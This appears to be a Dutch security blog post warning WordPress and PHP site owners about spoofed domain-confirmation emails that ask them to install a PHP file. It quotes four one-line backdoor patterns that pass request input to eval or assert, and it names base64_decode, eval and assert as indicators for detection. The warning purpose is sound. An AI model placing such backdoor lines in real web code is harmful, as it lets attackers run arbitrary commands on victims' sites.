Vertrouw die nep-e-mails voor domeinbevestiging niet.
Als u ooit een brief ontvangt waarin u wordt gevraagd om PHP-code op uw website te maken, te downloaden of te installeren, moet u die negeren.
English version: Do not trust those fake domain confirmation emails
Onlangs ontvingen enkele van mijn klanten vreemde e-mails van hun domeinregistrators. Deze e-mails bevatten een verzoek om hun domeinen te bevestigen. Ik heb een van die e-mails gecontroleerd en al snel vastgesteld dat het een frauduleuze e-mail betrof. Alle e-mails vertonen een identiek patroon en vragen om een PHP-bestand aan te maken in de rootmap van een website met een specifieke naam en de opgegeven inhoud. Het spreekt voor zich dat de voorgestelde inhoud voor dat PHP-bestand kwaadaardige code bevat, ook wel bekend als backdoor-code. Dit soort code stelt een aanvaller in staat om elke gewenste actie uit te voeren op de website van het slachtoffer.
Als je ooit een brief ontvangt waarin je wordt gevraagd om PHP-code op je website te maken, te downloaden of te installeren, moet je die negeren. Zonder uitzonderingen. Zelfs als de brief van de president of je moeder komt.
Oplichtingsmails lijken legitiem vanwege een legitiem afzenderadres . Maar het is e-mailspoofing. Je verwacht toch geen nepmail van vrienden of je domeinregistrar? Nee! Elke e-mail kan een willekeurig afzenderadres bevatten. De meeste e-mailservers en e-mailprogramma's controleren of verifiëren het afzenderadres niet. Je ziet het dan als een poging tot hacken. Vertrouw geen enkele e-mail die je van een bekende afzender ontvangt als de mail een verzoek bevat om iets verdachts te doen, zoals het installeren van code op je website of applicatie op je computer.
Technische details
Valse e-mails bevatten meestal een aantal van de volgende PHP-regels.
assert(stripslashes($_REQUEST['something']));
eval(stripslashes($_REQUEST['something']));
assert(base64_decode($_REQUEST['something']));
eval(base64_decode($_REQUEST['something']));
Ter info: base64_decode, eval en assert zijn bekende indicatoren van verdachte of kwaadaardige PHP-code.
Zie ook: Plugin Inspector onthult beveiligingsproblemen met andere plugins
PHP-waarschuwing: Kan headerinformatie niet wijzigen.
WP Cerber Security 8.3
I'm a team lead in Cerber Tech. I'm a software & database architect, WordPress - PHP - SQL - JavaScript developer. I started coding in 1993 on IBM System/370 (yeah, that was amazing days) and today software engineering at Cerber Tech is how I make my living. I've taught to have high standards for myself as well as using them in developing software solutions.